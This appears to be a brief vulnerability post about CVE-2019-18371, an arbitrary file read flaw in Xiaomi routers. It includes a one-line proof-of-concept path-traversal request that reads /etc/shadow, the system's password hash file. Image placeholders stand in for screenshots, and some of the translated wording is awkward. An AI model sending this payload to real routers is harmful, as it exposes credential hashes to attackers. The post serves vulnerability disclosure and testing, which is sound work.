Post

Xiaomi Router Extdisks Arbitrary File Reading Vulnerability Cve 2019 18371

Xiaomi Router Extdisks Arbitrary File Reading Vulnerability Cve 2019 18371

Xiaomi router extdisks arbitrary file reading vulnerability CVE-2019-18371

Vulnerability Description

Xiaomi router has a random file reading vulnerability, and attackers can read server sensitive information through the vulnerability

Vulnerability Impact

Xiaomi router

Network surveying and mapping

Vulnerability reappears

Login page

img

Verify POC

1
/api-third-party/download/extdisks../etc/shadow

img

This post is licensed under CC BY 4.0 by the author.